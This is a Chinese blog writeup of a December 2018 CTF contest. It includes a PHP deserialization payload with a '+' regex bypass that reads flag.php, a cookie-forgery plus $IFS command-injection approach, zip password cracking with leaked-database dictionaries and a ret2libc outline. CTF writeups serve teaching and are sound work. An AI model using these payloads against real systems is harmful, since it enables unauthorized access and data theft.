安恒月赛writeup 2018年12月

最新推荐文章于 2020-12-21 17:07:54 发布
最新推荐文章于 2020-12-21 17:07:54 发布
阅读量1.5k 收藏 3
点赞数 1
分类专栏: pwn 训练
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38783875/article/details/85218491
版权
pwn 同时被 2 个专栏收录
20 篇文章 3 订阅
订阅专栏
训练
13 篇文章 0 订阅
订阅专栏

目录

misc1

misc2(签到)

misc3 (学习资料)

misc4(JUJU)

web1

web2

pwn1

misc和web,和一道pwn

misc1

看提示想到去下当时泄露的库

然后写脚本处理一下把数据库的内容,生成三个由用户名,密码,邮箱组成的字典,使用密码组成的字典爆开了压缩包

解压后得到个动图,记录上面的数字得到23685528276158852365572716835687172857481317

剩下的。。。。

misc2(签到)

misc3 (学习资料)

这道题下载之后,解压后发现有一个加密过的压缩包,和一个txt。想到有明文攻击

将txt压缩成zip文件(注意压缩工具,最好选择winrar,不同的压缩工具压缩算法会有差别)

利用工具ARCHPR4.53进行明文攻击,破解压缩包密码(关于工具版本问题,队友的工具版本不同,破解不成功

这个版本是师傅推荐的比较靠谱的版本)

破解成功

解压之后的到一个word文档,打开发现没有什么东西(队友的打开就有flag,只是不能复制,原因成迷)

将word文档后缀改为zip解压后得到一堆东西,在/word/document.xml里面发现flag

{edaa144c91a4e5b817e4a18cbdb78879}
 

misc4(JUJU)

下载之后是一张png图片,很容易就想到修改宽高(更多姿势

winhex打开之后

我们把高修改为和宽一样的值

保存之后,就会发现图片显示的东西比原来多了

将图片下方的编码 进行base32解码,得到flag{a213072327f762855e475779eb081ca3}

web1

御剑扫了之后发现有之后发现有admin.php和DS_Store文件,利用DS_Store文件泄露工具(ds_store_exp),把文件下载到本地

直接访问admin.php发现有提示信息,不是admin访问不了

访问主页,抓包发现cookie里面有一个user字段,解base64发现是user

尝试把user字段的值,改为base64加密的amdin,发现有302 跳转至admin.php,继续修改cookie值,访问到了后台

结合之前通过DS_Store泄露出的文件admin.html里面有这样的提示

知道应该是命令执行,抓包后发现如果输入命令有空格,会返回错误提醒,百度之后发现$IFS可以一定情况下代替空格的作用,用作分隔

找到flag

web2

打开题目之后看见这样的代码

 <?php  
@error_reporting(1); 
include 'flag.php';
class baby 
{   
    public $file;
    function __toString()      
    {          
        if(isset($this->file)) 
        {
            $filename = "./{$this->file}";        
            if (file_get_contents($filename))         
            {              
                return file_get_contents($filename); 
            } 
        }     
    }  
}  
if (isset($_GET['data']))  
{ 
    $data = $_GET['data'];
    preg_match('/[oc]:\d+:/i',$data,$matches);
    if(count($matches))
    {
        die('Hacker!');
    }
    else
    {
        $good = unserialize($data);
        echo $good;
    }     
} 
else 
{ 
    highlight_file("./index.php"); 
} 
?>

发现他自己定义了一个baby类,里面调用了file_get_content函数,我们可以通过给data,实例化这个类从而执行file_get_content这个函数

利用脚本构造payload

 <?php  
@error_reporting(1); 
include 'flag.php';
class baby 
{   
    public $file;
    function __toString()      
    {          
        if(isset($this->file)) 
        {
            $filename = "./{$this->file}";        
            if (file_get_contents($filename))         
            {              
                return file_get_contents($filename); 
            } 
        }     
    }  
}  
$data=new baby();
$data->file = "flag.php";
echo serialize($data);

?>

然后preg_match('/[oc]:\d+:/i',$data,$matches);

匹配data中是否有(o或c:数字:(不区分大小写))这样条件的内容,有的话返回hacker,百度之后加号可以绕过

 

O:+4:"baby":1:{s:4:"file";s:8:"flag.php";}

但是如果get这段数值,加号会被替换成空格,导致反序列化失败,所以把+进行url编码,之后再赋值

O:%2b4:"baby":1:{s:4:"file";s:8:"flag.php";}

拿到flag   ad2328a2c3f0933c053fd3c6f28f6143

pwn1

messageb0x

 

 

洞在此处,还有一点:

 

函数的汇编是这样的,我不确定ida里给的偏移是否正确,在peda中好探测

gdb调试:

 

 

b *0x080492e2

r:

 

 

92:

 

思路:

没有在程序中发现system函数,也没有/bin/sh 

1.没有system,选择用int80来做:

 ROPgadget --binary messageb0x | grep "int 0x80":

没有找到:

/bin/sh:

也木有

换思路:

1.泄露puts函数地址

2.获取libc版本号

3.获取/bin/sh地址

4.payload:

这里个人感觉有些小坑,刚开始ret用的main的,但是打exp卡住,后来看函数汇编:

不是leave;ret的,构造的main rop打不了,后来换了process_info,绕过了main的 ret,打成功了,记得要常看代码的汇编。。。。

pwn还没有自己复现,wp来自队友 , 有时间再自己复现,到时候再补

 

SsMing.
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安恒杯EIS2017 writeup
Aurora的博客
11-07 6168
上星期参加了安恒杯EIS2017,记录一下。 Misc   签到题   扫二维码可得     隐藏在黑夜里的秘密   下载压缩包,打开时提示加密,猜测可能是伪加密,于是用 010editor 把加密位去掉,置为 0。然后解压压缩包,发现里面有个 flag,怀着激动的心情打开一看,结果是这样的:   夜已降临之时, 我将自己裹在深邃的黑暗中, 在夜的最深处 期待
2018安恒杯10赛RE&amp;MISC周周练
qq_42192672的博客
11-18 3023
赛反正我是错过了,这次周周练有四道题来看看,菜鸡就该多学习 1.easytree 拖进linux,发现跑不起来,eng? file一下,结果发现是exe PEID查一下 upx壳,直接脱,拖进IDA,直接看main函数 依次分析一下函数吧,2400不知道是啥,198E里面就是欢迎我们的字符串 我们输入的的字符串长度要是15才行 最后我们运算一通之后字符串要转变为aW...
安恒月赛-201812
wyj_1216 House
12-23 1168
签到题 没啥好说的,什么牛不能跑?蜗牛 ezweb2 题目: http://101.71.29.5:10000/index.php 解题思路: 拿到题目后,扫了一波: python3 dirsearch.py -u http://101.71.29.5:10000 -e php 发现:admin.php 进入查看,显示无法进入 查看页面信息,发现user登录信息,在存储值可更改。 将其先进行...
安恒月赛WriteUp-2018.12
BlusKing
12-22 2904
安恒月赛WriteUp2018-12   WEB1-easy: web1反序列化   一打开就显示了源代码:  &lt;?php   @error_reporting(1); include 'flag.php'; class baby {        public $file;     function __toString()           {      ...
安恒杯 writeup
Assassin
10-15 5605
总结说会的正题不难,不会的实在是难的可以…web1 iphone6直接将user-agent改成手机的就可以了,很简单不截图web2 jshunt这个题目我没有调出来来,但是明显就是xss,很困惑。 首先扫描了一下目录发现了tmp目录和up目录。up目录明显就是我们上传的jpg文件,有文件类型限制,但是没有 MIME检查,写入后是base64加密后的内容。而tmp内容更是直截了当,可以构造<ht
猫片(安恒)-writeup
Jgirl_QT_1024的博客
04-02 1374
提示:LSB BGR NTFS LSB:最低有效位 BGR:色彩模式 NTFS:(这个本弟弟不知道是什么,感觉要凉)NTFS (New Technology File System),是 WindowsNT 环境的文件系统。新技术文件系统是Windows NT家族(如,Windows 2000、Windows XP、Windows Vista、Windows 7和 windows 8.1...
安恒杯赛题目参赛源码+项目说明.zip
最新发布
01-23
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。 ...安恒杯赛题目参赛源码+项目说明.zip
2018-10安恒逆向题目
10-29
201810安恒月赛逆向题目。
安恒9赛部分复现记录
0verWatch的博客
09-30 1933
前言 赶紧趁着电脑的屏幕修好了,刚好安恒的web题目有复现,赶紧做。。。。。又从这几个题目里面学习到新知识了小结一下 正文 web babybypass 这个题目我记得我当初做的时候是一直考虑着用$以及_去绕过这些数字字母之类的东西,突然发现他这个题目里面把那个$以及_也经过了过滤,这样的话就少了很多可能性,而且这题比原题的限制长度小了,更有难度。现在就开始总结一下从这个题目学到的知识点 1.ph...
安恒201812赛wp web部分
南天_princess的博客
12-22 745
好久没有打过ctf,正好周末有时间,打了一波安恒的赛感觉挺基础的,比较适合像我这样的萌新,这次记录一下解题的过程。做得时候没有截图,最后想写的时候就剩一点没关的页面可以截几个图 web1 题目地址:http://101.71.29.5:10000 题目打开看着是一个网站,按照常规的思路先御剑扫描,发现存在admin.php、存在.DS_Store文件,存在文件泄露,ds_store_exp 是一...
安恒月赛writeup 20192
SsMing的博客
02-24 2417
劝退赛,菜的真实,web一题不会,暴风流泪 MISC 玩游戏 下载附件后,得到一个exe和题目说明,运行exe后,发现题目分为三个关卡 第一关 看见是解盲文,有在线解盲文的网站,解密后为下面图中所示 看见这一串,数了位数后怀疑是一个字符串的md5值,百度之后发现是 hello 的MD5值,第一关通过 第二关 要提交两个MD5值相同的文件,使用工具fastcoll (...
安恒月赛WP
weixin_34204057的博客
03-14 485
一叶飘零大佬的WP:安恒月赛 二进制部分:zjgcjy大佬的WP reverse1更容易理解的一种解法 pwn1详解 二 一叶飘零WP 二进制部分: reverse Pwn 三 。。。 转载于:https://www.cnblogs.com/wintrysec/p/10534328.html...
安恒月赛 DASCTF 7
pone2233的博客
07-25 1212
文章目录比赛介绍比赛感受Miscwelcome to the misc world | 成功QrJoker | 未验证过,因为比赛结束了 比赛介绍 安恒月赛 DASCTF 7赛 比赛感受 这次太菜了,都做只做了2个,哎,我觉得还需要锻炼,加油。 Misc welcome to the misc world | 成功 拿到文件使用7z这个压缩包软件,直接能看到这个flag,在这里,可是需要解压密码 我就开始分析一下这个给的素材 在图片红色通道看到png的格式 点击这个Save Bin 保存一个图片文件
2020.4.25 安恒月赛
Bsecure的博客
04-26 766
title: CTF比赛 date: 2020-04-25 19:27:55 tags: 第一次做在线CTF: 安恒四杯 首先就是杂项的一道题, 虽然简单, 但是记录一下自己的成果. 下载下来是一个流量包, 题目也没有提示, 就先用binwalk看能不能提取出什么. 直接 binwalk -e, 什么也没有, 但是我们往下看一下, 是有个压缩包. 那就手动提取吧. dd if=3.pc...
Bugku writeup 猫片(安恒)
qq_40737798的博客
03-10 2388
Bugku writeup 猫片(安恒) 题目: 解题: 1、首先打开题目附件,得到一个png的二进制文件。用010editor打开,发现头部内容显示为png,因此修改文件后缀,得到一张图片。 打开虚拟机跑一下binwalk,没有任何其他收获;打开pngcheck检查一下,也无异常。 2、在这时,思考hint内容:LSB、BGR,故使用Stegsolve,在Data Extract内勾选L...
安恒月赛-dasctf 部分writeup
热门推荐
zhang14916的博客
04-26 3万+
1.crypto-not rsa 题目很简单,r是一个随机数,g=n+1,已知(pow(g,m,n*n)*pow(r,n,n*n))%(n*n)=c,即密文c,求解明文m。我们根据二项式定理易知可将pow(g,m,n*n)=pow(n+1,m,n*n)=pow(m*n+1,n*n)。由于n=p*q,所以我们知道phi(n*n)=p*(p-1)*q*(q-1)。我们对加密公式两侧同时加(p-1)*...
安恒杯 3线上个人赛WriteUp
weixin_34090643的博客
03-26 641
#前言 这次做的还挺多的,只有个Web300没做出来,排名由上次60+进步到这次16名(最后三分钟掉了5名),感觉还是不错的。但是很明显,流量题有很大的运气成分。做完流量题之后还剩一个多小时,水了水Misc,然而之前从来没做过,不知道有什么套路,到最后也没做出来。看看排名靠前的大佬基本就是Web+Crypto+Misc+Re+流量,我的知识面还是太窄了。下面好好加油吧,Re也要学学了。 #Web ...
安恒赛php_CTF-安恒18十一赛部分writeup
weixin_39784460的博客
12-21 208
安恒十一writeup昨天做了一下十一的题目,不才只做出来几道签到web1这个是十的原题,因为忘了截图所以只能提供思路Web消息头包含了登陆框的密码输入密码后进入上传页面,上传一句话木马1.jpg,使用burp将上传文件名改为1.php.jpg然后post数据发现已经getshellFlag就在上一层目录里所以post数据:system(‘dir ../’);得出flag为:flag{6...
2018 -12安恒月赛 pwn
Maxmalloc的博客
12-23 1483
Messageb0x $ file messageb0x messageb0x: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=d932d2afbca74...
安恒网络安全实战攻防演练策略与指南
"安恒网络安全实战攻防演练应对指南.pdf" 该文档是安恒信息提供的一份关于网络安全实战攻防演练的应对指南,主要针对如何准备和应对网络安全挑战提供了详尽的指导。安恒信息是一家专注于信息安全服务的公司,其科创...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值